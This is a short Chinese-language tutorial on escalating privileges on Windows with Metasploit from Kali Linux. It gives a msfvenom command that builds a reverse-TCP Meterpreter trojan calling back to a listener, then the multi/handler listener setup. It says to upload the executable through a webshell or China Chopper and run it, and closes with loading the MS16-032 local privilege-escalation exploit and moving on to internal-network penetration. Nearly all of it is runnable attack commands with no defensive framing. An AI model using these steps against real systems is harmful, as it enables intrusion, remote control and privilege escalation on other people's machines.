kali下msf提权

人盡茶涼 提交于 2019-11-26 09:22:22
  1. 生成木马

 

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

 

  1. 配置监听程序

  Msfconsole 打开Metaploit

 

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.184.132

Exploit

 

 

 

现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行

这样就监听成功了  获得一个session (会话)

 

Getuid 查看主机名

 

shell 进入命令行模式

 

当然这里也可以加载exp

Exit 返回到meterpeter模式

Background 返回 multi/handler

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp

 

Session 1 返回之前的会话

Exploit 进行提权

 

这说明exp执行成功,可以进一步提权,内网渗透了

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!